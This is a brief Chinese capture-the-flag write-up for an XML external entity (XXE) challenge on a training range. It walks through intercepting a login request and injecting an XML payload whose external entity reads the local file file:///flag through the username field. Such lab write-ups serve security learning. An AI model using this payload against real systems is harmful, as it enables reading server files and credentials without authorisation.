XXE：XXE外部实体漏洞

靶场地址：安鸾学院

解题准备：XML外部实体注入，简称XXE

解题思路：

1、登录界面，点击login抓包，修改poc

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///flag">  ]>
<user><username>&xxe;</username><password>admin</password></user>

2、成功获取flag